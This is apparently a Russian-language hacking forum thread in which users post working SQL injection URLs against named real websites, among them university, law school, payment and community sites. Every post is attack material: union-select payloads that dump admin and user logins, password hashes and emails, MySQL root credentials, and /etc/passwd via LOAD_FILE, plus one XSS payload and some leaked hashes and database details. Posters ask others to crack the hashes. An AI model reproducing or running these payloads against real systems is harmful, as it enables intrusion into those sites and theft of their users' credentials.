Официальный сайт Полины Гагариной певица и просто красивая девушка код: http://www.gagarina.com/news.php?id=-41+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a,user_icq),3,4,5,6+from+phpbb_users+limit+1,1/* свыше 200 юзеров, не разобрался в какой кодировке пароли md5^^
sql Code: http://www.si.umich.edu/CHICO/instrument/fullrecord.phtml?id=9999+union+select+1,2, USER(),4,5,VERSION(),7,8,9,DATABASE(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* user [email protected] version 4.0.13 database chico Code: http://www.law.harvard.edu/faculty/directory/facdir.php?id=-1+ union+select+concat(user(),0x3a,version(),0x3a,database())/* user facdir@hlssun1 version 4.0.20-log database academics Code: http://www.kievsex.com/shop/?cat_id=99999+union+select+1,concat(username,0x3a,user_password,0x3a,user_ email,0x3a,user_icq),3,4,5,6,7,8,9,10+from+phpbb_ users+limit+1,1/* мож кто расшифрует... Code: http://asya-club.ru/board/message.php?id=-1+union+select+1,2,version(),user(),5,6, database(),8/* version 5.0.41-log user arigato@localhost database asyaclu5_chateng _http://asya-club.ru/board/message.php?id=-1+union+select+1,2,user,4,password,6,7,8+from+mysql. user/* root:02462cca620de2cd _hxxp://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),6,7,8/* _http://asya-club.ru/board/message.php?id=-1+union+select+1,2,3,4,pwd,6,login,8+from+administrators/*
InterComp - Все о компьютерах и для вашего компьютера (hardware, software) Code: http://intercomp.net.ru/dll/file.php?id=-1+union+select+1,2,concat(username,0x3a,user_password ,0x3a,user_email,0x3a,user_icq),4+from+phpbb_users+limit+1,1/* вывод под фразой "Описание DLL"... Code: http://www.inso.edu.ru/seminars/info.phtml?id=-1+union+select+1,2,3,4,USER(),VERSION(),7,8,DATABASE( ),10,11,12,13,14,15,16,17,18,19,20/* user [email protected] version 4.0.27-log database mlogos
.ro пройдемся по Румынии: _htp://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,concat(user(),0x3a,version(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* подбираем столбец и таблицу: Code: http://ori.utcluj.ro/burse/detalii_bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(column_name,0x3a,table_name),16,17,18+from+INFORMATION_SCHEMA.COLUMNS+limit+160,1/* выводим логин:пароль админа: _http://ori.utcluj.ro/burse/detalii_ bursa.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(username,0x3a,password),16,17,18+from+adabsolutum_admin/*
АРТЕК в детстве очень мечтал туда попасть... код: http://www.artek.org/index.phtml?ID=-101101+union+select+1,2,3,4,5,6,7,concat(uname,char(58),sname,char(58),nick,char(58),email,char(58),password),9,10,11,12,13,14+from+artekovtsi+limit+7,1/*
Code: https://maps.tva.com/scripts/store/cart.asp?ID=1+or+1=(SELECT+TOP+1+Username+FROM+Login)-- колонка с паролями - Password
popmech.ru 4.0.26opmech[email protected] Code: http://www.popmech.ru/part/?articleid=2195+UNION+SELECT+concat(name,char(58),password)+from+users+--+&rubricid=4
http://www.generationrice.com/index.phtml?talk=carlnomura_-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
Биржа РаботЪ код: http://www.rubler.ru/users/user.phtml?id=-20+union+select+1,2,3,4,concat(login,char(58),email,char(58),password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+rf+limit+3691,1/* в бд 3691 юзер,пароли в открытом виде :wink:
Code: http://buy-sell.in/fullnews.php?id=-1+union+select+1,email,3,4,password+from+members+limit+31,1/* мускул 4, вход по имэйл, юзеров 31 =\
Code: http://www.realkerala.in/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,9,10,11,concat(column_name,0x3a,table_name,0x3a),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+INFORMATION_SCHEMA.COLUMNS+limit+1,1/*/* PR 4
красивый сайт Code: http://www.femina.in/viewpost.php?id=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71 ),0x71),3, 4,5,6,7,8,9,10,11,12,13,14,15/* а форум еще лучше =) Code: http://www.femina.in/viewpost.php?id=-1+union+select+1,concat(username,0x3a,user_password,0x3a,user_email,0x3a, user_icq),3,4,5,6,7,8,9,10,11,12,13,14,15+ from+phpbb_users+limit+1,1/*
edu.in Code: http://www.vedanta.[SIZE=2][COLOR=Green]edu[/COLOR][/SIZE].in/page.php?id=-2+union+select+ 1,2,concat( user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14/* табличка и колонка: Code: htp://www.vedanta.edu.in/page.php?id=-2+union+select+1,2,3,4,5,6,concat(column_name,0x3a,table_ name, 0 x3a),8,9,10,11,12,13,14+from+ INFORMATION_SCHEMA.COLUMNS+ lim it+160,1/* а вот сами логин + хэш =) Code: http://www.vedanta.edu.in /page.php?id=-2+union+ select+1,2,[COLOR=Teal]username[/COLOR],4,5,6,[COLOR=Teal]password[/COLOR],8, 9,10,11,12,13,14+from+ [COLOR=SeaGreen]admin[/COLOR]/*
.EDU красивая скуля, код: http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,CAST(concat(column_name,char(58),table_name)+AS+BINARY),4+from+information_schema.columns/* нашел только это, код: http://webmaster.upi.edu/~ghmahendra/wap/newsdetail.php?id=-21+union+select+1,2,concat(username,password),4+from+admina/* кто доработает?
https://ssl.paycash.ua/cgi-bin/error.cgi?code=-300%20union%20select%20'Это%20в<script>alert("XSS")</script>ывод' Нашел вот такую скулю (впервые в cgi скрипте). Единственное что придумал это ХСС. Извесны таблицы errors и partners. Больше вытянуть ничего не удалось. А может и нету тут нифига. Кто найдет, расскажите
А такие скули стоит выкладывать? код: http://wap.sarbc.ru/news/shownews.phtml?id=-71891+union+select+1,2,3,4,concat(char(58),char(58),char(58),char(58),char(58),name,char(58),passwd),6,7,8,9,10,11,12+from+user+limit+1,1/* p.s At me today birthday
Code: http://www.kraak.net/en/releases.php?ID=-31+union+select+1,2,3,4,concat(username,0x3a,userpassword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+user/*
